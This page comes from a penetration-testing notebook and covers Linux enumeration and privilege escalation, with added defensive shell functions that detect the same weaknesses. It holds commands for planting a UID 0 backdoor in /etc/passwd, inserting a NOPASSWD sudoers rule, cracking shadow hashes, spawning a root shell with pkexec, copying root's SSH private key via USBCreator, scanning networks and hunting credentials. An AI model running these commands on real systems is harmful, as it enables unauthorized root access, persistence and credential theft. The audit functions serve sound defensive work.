P4n1cBook

Enumeration


Last updated 2 months ago

Basic
Host Info
uname -a
Check Environment
env
Check user permissions
sudo -l
Check the host's IP addresses (-I prints every configured address, not the hostname itself)
hostname -I
Check the internal network
ifconfig
User with shells
grep "sh$" /etc/passwd
Check Ownership by group
find / -group management 2>/dev/null
Check processes
ps auxww
Check mounted devices
mount
Container processes
ps auxww | grep docker
ps auxww | grep lxd
Read crontab file
cat /etc/crontab
Check Services running
ls /etc/init.d
Check System info
uname -a
Check groups file
cat /etc/group

Members of the adm group can read the log files under /var/log (cat on the directory itself fails; list it and read individual files).

ls -la /var/log
Show listening ports
netstat -tuln
netstat -tnl
Show all TCP sockets, including services bound only to localhost (on Linux netstat -p means "show PID", so use -t to select TCP; netstat -an -p tcp is the BSD/macOS form)
netstat -ant
Check binaries with capabilities
getcap -r / 2>/dev/null
SUID/SETGID binaries
find / -perm -4000 -or -perm -2000 2>/dev/null
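The find command above lists every SUID/SGID file, but on a real host that is dozens of legitimate binaries. What a practitioner usually wants is the difference from a known-good inventory. The functions below are an added example, not part of the book; they wrap the page's find expression (with parentheses, which are required as soon as a -type test is appended, otherwise -type f binds only to the -perm -2000 branch) and compare the result against a hypothetical baseline file of expected paths.

```shell
#!/bin/sh
# list_setuid ROOT: SUID/SGID regular files under ROOT, sorted for comm.
# Added example; ROOT is a hypothetical parameter so the check can run
# against "/" on a live host or against a mounted image / test tree.
list_setuid() {
    # Parentheses matter: without them "-type f" applies only to -perm -2000.
    find "$1" \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null | LC_ALL=C sort
}

# suid_diff BASELINE ROOT: print SUID/SGID files present now but absent from
# BASELINE (one absolute path per line). Anything printed is either a new
# package or a binary someone made setuid, and deserves a look.
suid_diff() {
    baseline_sorted=$(mktemp)
    current=$(mktemp)
    LC_ALL=C sort "$1" > "$baseline_sorted"
    list_setuid "$2" > "$current"
    # comm -13: suppress lines unique to the baseline (1) and common lines (3)
    comm -13 "$baseline_sorted" "$current"
    rm -f "$baseline_sorted" "$current"
}

# Usage on a live system (baseline captured earlier with list_setuid / > baseline.txt):
#   suid_diff baseline.txt /
```

The baseline should be captured right after install or from a trusted image of the same build; a diff run from cron or a config-management check then turns the page's one-off enumeration into a recurring detection.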
Traces library function calls
ltrace ProgramName
Search Kernel for Exploits
searchsploit "Linux Kernel" | grep <version>
/etc/passwd

Write Permissions

Generate the password hash
openssl passwd -1 tokyo
Append a UID 0 entry that uses the generated hash to /etc/passwd
echo 'tokyo:$1$iLayOiAd$8dHGiU.Qvk/uqjnoWzRpm/:0:0:tokyo:/root:/bin/bash' >> /etc/passwd
/etc/shadow
Save the hash line to a file
echo 'zoe:$y$j9T$Ct0y5TNQ/sv95CFPz510O/$7YtCDOBISfngZeQ3rsDkRcw2XTFDgHBkxDpuhyBLNO1:1002:1002:zoe:/home/zoe:/bin/bash' > shadowHash.txt
Crack the hash ($y$ is yescrypt, which john handles with the crypt format)
john --wordlist=~/Documents/Wordlists/rockyou.txt shadowHash.txt --format=crypt
/etc/sudoers
Try to read it
cat /etc/sudoers
  • If the file is read-only, you need to change its permissions to allow write access:

chmod +w /etc/sudoers
  • Add the following line:

yourUser   ALL=(ALL) NOPASSWD: ALL
  • Restore the original file permissions to make it read-only again:

chmod 440 /etc/sudoers
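The three sections above (/etc/passwd, /etc/shadow, /etc/sudoers) each rely on a file being writable or readable when it should not be, and each leaves a recognisable trace: a second UID 0 account, a world-readable shadow file, a NOPASSWD: ALL rule. The function below is an added example (not the book's code) that checks for exactly those conditions. ROOT is a hypothetical parameter: pass an empty string for the live system or a mount point for an offline image; it assumes GNU stat (-c '%a').

```shell
#!/bin/sh
# audit_sensitive_files ROOT: report the weaknesses and artefacts of the
# passwd/shadow/sudoers tricks shown above. Added example; ROOT is a
# hypothetical parameter ("" = live system, "/mnt/disk" = offline image).
audit_sensitive_files() {
    root="$1"
    for f in etc/passwd etc/shadow etc/sudoers; do
        path="$root/$f"
        [ -e "$path" ] || continue
        mode=$(stat -c '%a' "$path")          # e.g. 644 (GNU coreutils)
        # the last octal digit holds the permissions for "others"
        case "$mode" in
            *[2367]) echo "WORLD-WRITABLE $path (mode $mode)" ;;
        esac
        # shadow must never be readable by others: its hashes become crackable
        case "$f:$mode" in
            etc/shadow:*[4567]) echo "WORLD-READABLE $path (mode $mode)" ;;
        esac
    done
    # a second UID 0 account is the signature of the passwd trick above
    [ -r "$root/etc/passwd" ] && \
        awk -F: '$3 == 0 && $1 != "root" { print "EXTRA-UID0 " $1 }' "$root/etc/passwd"
    # NOPASSWD: ALL rules are what the sudoers trick inserts
    [ -r "$root/etc/sudoers" ] && \
        grep -nE 'NOPASSWD:[[:space:]]*ALL' "$root/etc/sudoers" \
        | sed 's/^/SUDOERS-NOPASSWD-ALL line /'
    return 0
}

# Usage: audit_sensitive_files ""        # live system
#        audit_sensitive_files /mnt/disk # mounted image
```

Each finding is one line with a fixed keyword first, so the output can be grepped or shipped to a log collector as-is. The sudoers check deliberately ignores /etc/sudoers.d; extend the loop if those drop-in files are in scope.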
Scan the local network
  • Find out how many hosts there are in the network by doing a ping sweep:

for i in {1..254}; do (ping -c 1 192.168.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;
  • If nc is installed, it can be used to scan for open ports:

nc -zv 192.168.0.1 1-65535 2>&1 | grep -v refused | tee scan
UDP scan
nc -uzv 192.168.0.1 1-65535 2>&1 | grep -v refused
Credential Hunting

Passwords

  • Search for the string pass (case-insensitive) in all files and directories recursively:

grep -iR "pass" * 2>/dev/null
  • Search for the string password in hidden files whose name contains a second dot, recursively (note that the glob .*.* also matches .., so this recurses into the parent directory as well):

grep password .*.* -r 2>/dev/null
  • Search for ssh keys recursively from the current directory you are in:

grep -iR -E "(ssh-(rsa|ed25519|dss|ecdsa|rsa1)[ ]+[A-Za-z0-9+/=]+|-----BEGIN [A-Z ]+PRIVATE KEY-----)" * 2>/dev/null

Hashes

MD5 hashes
grep -aPo '[a-fA-F0-9]{32}' /DESIRED/PATH
SHA-1
grep -aPo '[a-fA-F0-9]{40}' /DESIRED/PATH
SHA-256
grep -aPo '[a-fA-F0-9]{64}' /DESIRED/PATH
SHA-512
grep -aPo '[a-fA-F0-9]{128}' /DESIRED/PATH
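The key regex and the four hash patterns above work one at a time, and the fixed-width hex patterns over-report: a SHA-256 string contains two MD5-sized and one SHA-1-sized substrings, so grepping for {32} on a file of SHA-256 digests flags every line. The function below is an added example, not the book's own tooling: it reuses the page's SSH-key regex unchanged, takes the longest hex run instead of a fixed width and classifies it by exact length, and prints one path:TYPE line per hit. DIR is a hypothetical parameter.

```shell
#!/bin/sh
# scan_secrets DIR: one-pass sweep for SSH key material and bare hex digests.
# Added example; DIR is a hypothetical parameter, the key regex is the page's.
scan_secrets() {
    dir="$1"
    # Files holding an "ssh-<type> <base64>" public key line or a PEM
    # "-----BEGIN ... PRIVATE KEY-----" header (page regex, ERE form).
    grep -rlaE '(ssh-(rsa|ed25519|dss|ecdsa|rsa1)[ ]+[A-Za-z0-9+/=]+|-----BEGIN [A-Z ]+PRIVATE KEY-----)' \
        "$dir" 2>/dev/null | sed 's/$/:SSH-KEY/'

    # {32,} with -o is greedy, so each match is a maximal hex run; classify by
    # its exact length. A 64-char run is reported once as SHA-256, never as
    # two MD5s, and runs of other lengths (UUIDs, raw binary) are dropped.
    grep -raoE '[a-fA-F0-9]{32,}' "$dir" 2>/dev/null | awk '{
        n = split($0, parts, ":"); run = parts[n]
        path = substr($0, 1, length($0) - length(run) - 1)   # grep prints path:match
        type = ""
        if (length(run) == 32)       type = "MD5"
        else if (length(run) == 40)  type = "SHA-1"
        else if (length(run) == 64)  type = "SHA-256"
        else if (length(run) == 128) type = "SHA-512"
        if (type != "") print path ":" type
    }'
}

# Usage: scan_secrets /var/www    # or any directory tree worth auditing
```

Length alone cannot distinguish MD5 from NTLM or SHA-256 from a random 32-byte token, so treat the TYPE as "hex of that size" and confirm against context (file name, surrounding keys) before acting on it.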
Polkit
Check policy (the path is a directory, so list it and read the .conf files inside)
ls /etc/polkit-1/localauthority.conf.d
cat /etc/polkit-1/localauthority.conf.d/*
Become root
pkexec "/bin/sh"
USBCreator
  • The USBCreator D-Bus service lets a user with sudo permissions overwrite files as root:

Copy root private key
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/id_rsa true

Nmap Binary
Checklist - Linux Privilege Escalation - HackTricks